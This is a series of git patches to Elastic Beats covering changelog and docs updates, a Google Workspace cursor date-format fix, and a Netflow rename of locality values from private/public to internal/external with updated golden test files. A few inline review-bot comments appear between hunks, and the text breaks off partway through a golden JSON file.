From 48722e518e67f0320b29def543694a9d29b3228f Mon Sep 17 00:00:00 2001 From: Andres Rodriguez Date: Fri, 19 Mar 2021 17:25:04 +0100 Subject: [PATCH 01/20] Forward-port 7.11.2 changelog to 7.x (#24450) (#24655) * docs: Prepare Changelog for 7.11.2 (#24437) * docs: Close changelog for 7.11.2 * Remove empty sections. Fix breaking change entry Co-authored-by: Andres Rodriguez (cherry picked from commit 01930e9f9b09c281bf3798e9c477e8f40770f243) * Fix changelog.next Co-authored-by: Elastic Machine (cherry picked from commit 79b941a737494dfb3abfed525d9e9253340c13a6) --- CHANGELOG.asciidoc | 20 ++++++++++++++++++++ CHANGELOG.next.asciidoc | 5 +---- libbeat/docs/release.asciidoc | 1 + 3 files changed, 22 insertions(+), 4 deletions(-) diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 0d1ea0d2ebee..51c0f1f8aea3 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc @@ -3,6 +3,26 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.11.2]] +=== Beats version 7.11.2 +https://github.com/elastic/beats/compare/v7.11.1...v7.11.2[View commits] + +==== Bugfixes + +*Affecting all Beats* + +- Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] + +*Filebeat* + +- Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] +- Fix aws/vpcflow generating errors for empty logs or unidentified formats. {pull}24167[24167] +- Add `nodes` to filebeat-kubernetes.yaml ClusterRole. {issue}24051[24051] {pull}24052[24052] + +*Metricbeat* + +- Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] + [[release-notes-7.11.1]] === Beats version 7.11.1 https://github.com/elastic/beats/compare/v7.11.0...v7.11.1[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index eda9e956a018..a4c6df454a05 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc 
@@ -48,7 +48,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] - Rename `s3` input to `aws-s3` input. {pull}23469[23469] -- Add `nodes` to filebeat-kubernetes.yaml ClusterRole. {issue}24051[24051] {pull}24052[24052] *Heartbeat* - Adds negative body match. {pull}20728[20728] @@ -145,6 +144,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] - Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] - Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] +- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] *Auditbeat* 
@@ -245,11 +245,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] - Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] - Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] -- Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] - Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] - aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] - Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] -- Fix aws/vpcflow generating errors for empty logs or unidentified formats. {pull}24167[24167] - Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] - in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] - Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] @@ -326,7 +324,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] - Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] -- Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] - Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] - Unskip s3_request integration test. {pull}23887[23887] - Add system.hostfs configuration option for system module. {pull}23831[23831] diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index b84a4aa0ae91..7c6f3aa2a164 100644 --- a/libbeat/docs/release.asciidoc 
+++ b/libbeat/docs/release.asciidoc @@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> * <> * <> * <> From 3bf2586c2ddbf48b3c3964f6ebfd7096c60ec0c2 Mon Sep 17 00:00:00 2001 From: DeDe Morton Date: Fri, 19 Mar 2021 12:52:40 -0700 Subject: [PATCH 02/20] Add breaking changes for 7.12 (#24646) (#24658) --- .../breaking/breaking-7.12.asciidoc | 18 ++++++++++++++++++ .../release-notes/breaking/breaking.asciidoc | 5 +++++ 2 files changed, 23 insertions(+) create mode 100644 libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc diff --git a/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc new file mode 100644 index 000000000000..a5ef7e4929eb --- /dev/null +++ b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc @@ -0,0 +1,18 @@ +[[breaking-changes-7.12]] + +=== Breaking changes in 7.12 +++++ +7.12 +++++ + +//NOTE: The notable-breaking-changes tagged regions are re-used in the +//Installation and Upgrade Guide + +// tag::notable-breaking-changes[] + +No breaking changes. + +// end::notable-breaking-changes[] + +See the <> for a complete list of changes, +including changes to beta or experimental functionality. diff --git a/libbeat/docs/release-notes/breaking/breaking.asciidoc b/libbeat/docs/release-notes/breaking/breaking.asciidoc index 916b4670802f..8f10c73a7820 100644 --- a/libbeat/docs/release-notes/breaking/breaking.asciidoc +++ b/libbeat/docs/release-notes/breaking/breaking.asciidoc @@ -11,6 +11,8 @@ changes, but there are breaking changes between major versions (e.g. 6.x to See the following topics for a description of breaking changes: +* <> + * <> * <> @@ -35,6 +37,9 @@ See the following topics for a description of breaking changes: * <> + +include::breaking-7.12.asciidoc[] + include::breaking-7.11.asciidoc[] include::breaking-7.10.asciidoc[] 
From 4502e2ababdc0cb0d69bb874aee1d59bde324ccd Mon Sep 17 00:00:00 2001 From: Adrian Serrano Date: Sun, 21 Mar 2021 20:09:17 +0100 Subject: [PATCH 03/20] [ILM][Docs] Clarify how to change setup.ilm.pattern (#24129) (#24396) * ILM: Clarify docs about setup.ilm.pattern * address review comments (cherry picked from commit f3dda90b0458cf57d5556ad1f728bc5c00e4e633) Co-authored-by: DeDe Morton --- libbeat/docs/shared-ilm.asciidoc | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/libbeat/docs/shared-ilm.asciidoc b/libbeat/docs/shared-ilm.asciidoc index 3502596e1434..759660fe71f2 100644 --- a/libbeat/docs/shared-ilm.asciidoc +++ b/libbeat/docs/shared-ilm.asciidoc @@ -79,8 +79,10 @@ For more information, see {ref}/indices-rollover-index.html#_using_date_math_with_the_rollover_api[Using date math with the rollover API]. -NOTE: If you modify this setting after loading the index template, you must -overwrite the template to apply the changes. +NOTE: Before modifying this setting for an existing ILM setup, you must manually +remove any aliases related to the previous pattern, then overwrite the policy. +Existing indices that don't match the new pattern might no longer be subject to +index lifecycle management. [float] [[setup-ilm-policy_name-option]] From ba56e34727bba215f963fe16a8ff828bf65e7ae6 Mon Sep 17 00:00:00 2001 
From: Marc Guasch Date: Mon, 22 Mar 2021 15:04:46 +0100 Subject: [PATCH 04/20] Fix Google Workspace cursor date parsing (#24668) (#24671) (cherry picked from commit 7964c23e7460315a67d23114d85b3169a36d7675) --- CHANGELOG.next.asciidoc | 2 ++ .../filebeat/module/google_workspace/admin/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/drive/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/groups/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/login/config/config.yml | 4 ++-- .../filebeat/module/google_workspace/saml/config/config.yml | 4 ++-- .../module/google_workspace/user_accounts/config/config.yml | 4 ++-- 7 files changed, 14 insertions(+), 12 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index a4c6df454a05..18919d56ed14 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -251,6 +251,8 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] - in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] - Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] +- Fix Cisco ASA parser for message 722051. {pull}24410[24410] +- Fix `google_workspace` pagination. {pull}24668[24668] *Heartbeat* diff --git a/x-pack/filebeat/module/google_workspace/admin/config/config.yml b/x-pack/filebeat/module/google_workspace/admin/config/config.yml index 8c2c3824ed7e..1b992f50d132 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/admin/config/config.yml 
@@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/drive/config/config.yml b/x-pack/filebeat/module/google_workspace/drive/config/config.yml index 18eacfef7a20..e88aecca5280 100644 --- a/x-pack/filebeat/module/google_workspace/drive/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/drive/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/groups/config/config.yml b/x-pack/filebeat/module/google_workspace/groups/config/config.yml index 6d713ebdb29b..d40347b89fbc 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/groups/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: 
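Review bot: The corrected default `[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]` and the cursor value `[[formatDate now]]` in the following hunk both rely on formatDate's default layout, which is not visible in this diff; because the cursor is replayed into `url.params.startTime` on the next run, the two expressions must keep agreeing on that layout or the request will fail the way the replaced `parseDate now` form did. A comment above the `set` transform along the lines of `# startTime and the last_execution_datetime cursor share formatDate's default layout; keep them in sync` would record that dependency. The same two-line change is repeated in the drive, groups, login, saml and user_accounts config.yml files, which is why this bug had to be fixed six times; sharing that template block would avoid the next drift.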
@@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/login/config/config.yml b/x-pack/filebeat/module/google_workspace/login/config/config.yml index 3ce48abe77bc..6f1249bd1950 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/login/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log diff --git a/x-pack/filebeat/module/google_workspace/saml/config/config.yml b/x-pack/filebeat/module/google_workspace/saml/config/config.yml index da0641282fcf..d69484c939fe 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/saml/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log 
diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml index 2219d3ba1a0d..f67eb4208331 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml @@ -15,7 +15,7 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +27,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log From 98a5f97321ab44e49e40623afd22543e2e40d6ab Mon Sep 17 00:00:00 2001 
From: Adrian Serrano Date: Mon, 22 Mar 2021 16:26:11 +0100 Subject: [PATCH 05/20] netflow: Use internal and external for locality fields (#24295) (#24461) Changes netflow input to use internal and external for locality fields: - source.locality - destination.locality - flow.locality Previously it was using public and private. Fixes #24272 (cherry picked from commit 0c6acc9253830e57cc3ce9b81fe74799a30a1e6d) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/input/netflow/convert.go | 18 +- ...-extended-uniflow-template-256.golden.json | 12 +- .../IPFIX-Barracuda-firewall.golden.json | 48 ++--- ...IPFIX-Mikrotik-RouterOS-6.39.2.golden.json | 204 +++++++++--------- ...er-with-variable-length-fields.golden.json | 18 +- .../golden/IPFIX-Nokia-BRAS.golden.json | 6 +- .../golden/IPFIX-OpenBSD-pflow.golden.json | 156 +++++++------- .../testdata/golden/IPFIX-Procera.golden.json | 48 ++--- ...are-virtual-distributed-switch.golden.json | 26 +-- .../IPFIX-YAF-basic-with-applabel.golden.json | 12 +- ...igured-with-include_flowset_id.golden.json | 18 +- .../IPFIX-vIPtela-with-VPN-id.golden.json | 6 +- .../netflow/testdata/golden/IPFIX.golden.json | 72 +++---- ...w-9-Cisco-1941-K9-release-15.1.golden.json | 174 +++++++-------- .../golden/Netflow-9-Cisco-ASA-2.golden.json | 114 +++++----- .../golden/Netflow-9-Cisco-ASA.golden.json | 84 ++++---- ...o-ASR-9000-series-template-260.golden.json | 126 +++++------ .../Netflow-9-Cisco-ASR1001--X.golden.json | 150 ++++++------- ...tflow-9-Cisco-NBAR-flowset-262.golden.json | 30 +-- .../golden/Netflow-9-Cisco-WLC.golden.json | 76 +++---- ...flow-9-Fortigate-FortiOS-5.2.1.golden.json | 6 +- ...-9-Fortigate-FortiOS-54x-appid.golden.json | 102 ++++----- ...9-H3C-Netstream-with-varstring.golden.json | 6 +- .../testdata/golden/Netflow-9-H3C.golden.json | 96 ++++----- .../Netflow-9-Huawei-Netstream.golden.json | 6 +- .../golden/Netflow-9-IE150-IE151.golden.json | 12 +- ...et-in-large-zero-filled-packet.golden.json | 6 +- 
...Palo-Alto-PAN--OS-with-app--id.golden.json | 48 ++--- .../golden/Netflow-9-Streamcore.golden.json | 24 +-- ...ti-Edgerouter-with-MPLS-labels.golden.json | 96 ++++----- ...etflow-9-field-layer2segmentid.golden.json | 6 +- ..._netflow-reduced-size-encoding.golden.json | 72 +++---- .../golden/Netflow-9-macaddress.golden.json | 174 +++++++-------- ...w-9-multiple-netflow-exporters.golden.json | 44 ++-- .../Netflow-9-nprobe-DPI-L7.golden.json | 6 +- ...-template-with-0-length-fields.golden.json | 60 +++--- .../golden/Netflow-9-valid-01.golden.json | 38 ++-- .../golden/ipfix_cisco.pcap.golden.json | 58 ++--- ...netflow9_e10s_4_7byte_pad.pcap.golden.json | 36 ++-- ...flow9_ubiquiti_edgerouter.pcap.golden.json | 60 +++--- 41 files changed, 1180 insertions(+), 1175 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 18919d56ed14..1b2ea44d6ed6 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -48,6 +48,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] - Rename `s3` input to `aws-s3` input. {pull}23469[23469] +- Possible values for Netflow's locality fields (source.locality, destination.locality and flow.locality) are now `internal` and `external`, instead of `private` and `public`. {issue}24272[24272] {pull}24295[24295] *Heartbeat* - Adds negative body match. {pull}20728[20728] diff --git a/x-pack/filebeat/input/netflow/convert.go b/x-pack/filebeat/input/netflow/convert.go index 67053b4e6808..465cd3efd021 100644 --- a/x-pack/filebeat/input/netflow/convert.go +++ b/x-pack/filebeat/input/netflow/convert.go 
@@ -375,16 +375,20 @@ func fixMacAddresses(dict map[string]interface{}) {
 	}
 }
 
+// Locality is an enum representing the locality of a network address.
 type Locality uint8
 
 const (
-	LocalityPrivate Locality = iota + 1
-	LocalityPublic
+	// LocalityInternal identifies addresses that are internal to the organization.
+	LocalityInternal Locality = iota + 1
+
+	// LocalityExternal identifies addresses that are outside of the organization.
+	LocalityExternal
 )
 
 var localityNames = map[Locality]string{
-	LocalityPrivate: "private",
-	LocalityPublic: "public",
+	LocalityInternal: "internal",
+	LocalityExternal: "external",
 }
 
 func (l Locality) String() string {
@@ -408,14 +412,14 @@ func getIPLocality(internalNetworks []string, ips ...net.IP) Locality {
 	for _, ip := range ips {
 		contains, err := conditions.NetworkContains(ip, internalNetworks...)
 		if err != nil {
-			return LocalityPublic
+			return LocalityExternal
 		}
 		// always consider loopback/link-local private
 		if !contains && !isLocal(ip) {
-			return LocalityPublic
+			return LocalityExternal
 		}
 	}
-	return LocalityPrivate
+	return LocalityInternal
 }
 
 // TODO: create table from https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml
diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json
index 5a806ce7b058..fbc2f5e3d2ab 100644
--- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json
+++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-extended-uniflow-template-256.golden.json
@@ -7,7 +7,7 @@
 "Fields": {
 "destination": {
 "ip": "64.235.151.76",
- "locality": "public",
+ "locality": "external",
 "port": 443
 },
 "event": {
@@ -24,7 +24,7 @@
 },
 "flow": {
 "id": "kSpZ1WuBhjc",
- "locality": "public"
+ "locality": "external"
 },
 "netflow": {
 "audit_counter": 4157725,
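Review bot: The context comment `// always consider loopback/link-local private` in the getIPLocality hunk still uses the vocabulary this commit retires; now that the branch preserves LocalityInternal it should read `// always consider loopback/link-local internal`, otherwise the next reader has to reconcile two naming schemes for the same value. In the same loop an error from conditions.NetworkContains is mapped to LocalityExternal and dropped; if that error reflects a malformed internalNetworks entry (inferred — NetworkContains is not in the hunk), every flow would be labelled external with nothing in the logs, which hides a configuration mistake from anyone filtering on the locality fields, so a one-time warning or at least a comment such as `// an unparsable internal_networks entry classifies the address as external` would make that behaviour visible. getIPLocality's signature lies before the first line of this hunk, and the String method opened at the end of the first hunk continues outside it.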
@@ -84,7 +84,7 @@ "source": { "bytes": 0, "ip": "10.236.5.4", - "locality": "private", + "locality": "internal", "mac": "00:50:56:b9:26:46", "packets": 0, "port": 51917 @@ -99,7 +99,7 @@ "Fields": { "destination": { "ip": "10.236.5.4", - "locality": "private", + "locality": "internal", "port": 51917 }, "event": { @@ -116,7 +116,7 @@ }, "flow": { "id": "kSpZ1WuBhjc", - "locality": "public" + "locality": "external" }, "netflow": { "audit_counter": 4157725, @@ -176,7 +176,7 @@ "source": { "bytes": 0, "ip": "64.235.151.76", - "locality": "public", + "locality": "external", "mac": "00:00:00:00:00:00", "packets": 0, "port": 443 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json index 7a4aa57c8037..ec4f36b10faf 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Barracuda-firewall.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.99.252.50", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -24,7 +24,7 @@ }, "flow": { "id": "2vFIarATx_4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.252.50", @@ -72,7 +72,7 @@ "source": { "bytes": 0, "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 65105 @@ -87,7 +87,7 @@ "Fields": { "destination": { "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "port": 65105 }, "event": { @@ -104,7 +104,7 @@ }, "flow": { "id": "2vFIarATx_4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.130.239", @@ -152,7 +152,7 @@ "source": { "bytes": 81, "ip": "10.99.252.50", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 
@@ -167,7 +167,7 @@ "Fields": { "destination": { "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -184,7 +184,7 @@ }, "flow": { "id": "wU3G8idsscw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.98.243.20", @@ -232,7 +232,7 @@ "source": { "bytes": 0, "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 65105 @@ -247,7 +247,7 @@ "Fields": { "destination": { "ip": "10.99.130.239", - "locality": "private", + "locality": "internal", "port": 65105 }, "event": { @@ -264,7 +264,7 @@ }, "flow": { "id": "wU3G8idsscw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.130.239", @@ -312,7 +312,7 @@ "source": { "bytes": 81, "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 @@ -327,7 +327,7 @@ "Fields": { "destination": { "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -344,7 +344,7 @@ }, "flow": { "id": "rOmj8EdZ2dc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.98.243.20", @@ -392,7 +392,7 @@ "source": { "bytes": 0, "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 52344 @@ -407,7 +407,7 @@ "Fields": { "destination": { "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "port": 52344 }, "event": { @@ -424,7 +424,7 @@ }, "flow": { "id": "rOmj8EdZ2dc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.168.140", @@ -472,7 +472,7 @@ "source": { "bytes": 113, "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 
@@ -487,7 +487,7 @@ "Fields": { "destination": { "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -504,7 +504,7 @@ }, "flow": { "id": "JE7pThaMwJY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.98.243.20", @@ -552,7 +552,7 @@ "source": { "bytes": 0, "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 0, "port": 50294 @@ -567,7 +567,7 @@ "Fields": { "destination": { "ip": "10.99.168.140", - "locality": "private", + "locality": "internal", "port": 50294 }, "event": { @@ -584,7 +584,7 @@ }, "flow": { "id": "JE7pThaMwJY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.99.168.140", @@ -632,7 +632,7 @@ "source": { "bytes": 113, "ip": "10.98.243.20", - "locality": "private", + "locality": "internal", "mac": "00:00:00:00:00:00", "packets": 1, "port": 53 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json index 81b36a93d3ac..36fea0d68e1f 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Mikrotik-RouterOS-6.39.2.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.128.17", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "1SREAwMSn_Y", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.128.17", @@ -71,7 +71,7 @@ "source": { "bytes": 152, "ip": "10.10.8.197", - "locality": "private", + "locality": "internal", "packets": 2, "port": 123 } @@ -85,7 +85,7 @@ "Fields": { "destination": { "ip": "192.168.230.216", - "locality": "private", + "locality": "internal", "port": 82 }, "event": { 
@@ -101,7 +101,7 @@ }, "flow": { "id": "-1ecQ0Y-YzY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.230.216", @@ -149,7 +149,7 @@ "source": { "bytes": 502, "ip": "192.168.35.143", - "locality": "private", + "locality": "internal", "packets": 8, "port": 46518 } @@ -163,7 +163,7 @@ "Fields": { "destination": { "ip": "192.168.35.143", - "locality": "private", + "locality": "internal", "port": 46518 }, "event": { @@ -179,7 +179,7 @@ }, "flow": { "id": "_ztnBsqvzw4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.35.143", @@ -227,7 +227,7 @@ "source": { "bytes": 2233, "ip": "10.10.6.11", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -241,7 +241,7 @@ "Fields": { "destination": { "ip": "192.168.230.216", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -257,7 +257,7 @@ }, "flow": { "id": "83jerlRbQig", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.230.216", @@ -305,7 +305,7 @@ "source": { "bytes": 152, "ip": "192.168.128.17", - "locality": "private", + "locality": "internal", "packets": 2, "port": 123 } @@ -319,7 +319,7 @@ "Fields": { "destination": { "ip": "172.20.5.191", - "locality": "private", + "locality": "internal", "port": 42502 }, "event": { @@ -335,7 +335,7 @@ }, "flow": { "id": "r6DcuKSlKG8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.5.191", @@ -383,7 +383,7 @@ "source": { "bytes": 79724, "ip": "10.10.8.220", - "locality": "private", + "locality": "internal", "packets": 57, "port": 80 } @@ -397,7 +397,7 @@ "Fields": { "destination": { "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { 
@@ -413,7 +413,7 @@ }, "flow": { "id": "MJV4se1d1EY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.1", @@ -461,7 +461,7 @@ "source": { "bytes": 161, "ip": "172.20.4.199", - "locality": "private", + "locality": "internal", "packets": 3, "port": 10240 } @@ -475,7 +475,7 @@ "Fields": { "destination": { "ip": "172.20.4.199", - "locality": "private", + "locality": "internal", "port": 10240 }, "event": { @@ -491,7 +491,7 @@ }, "flow": { "id": "MJV4se1d1EY", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.199", @@ -539,7 +539,7 @@ "source": { "bytes": 245, "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 53 } @@ -553,7 +553,7 @@ "Fields": { "destination": { "ip": "10.10.8.34", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -569,7 +569,7 @@ }, "flow": { "id": "Md4y9RxWsu0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.10.8.34", @@ -617,7 +617,7 @@ "source": { "bytes": 504, "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "packets": 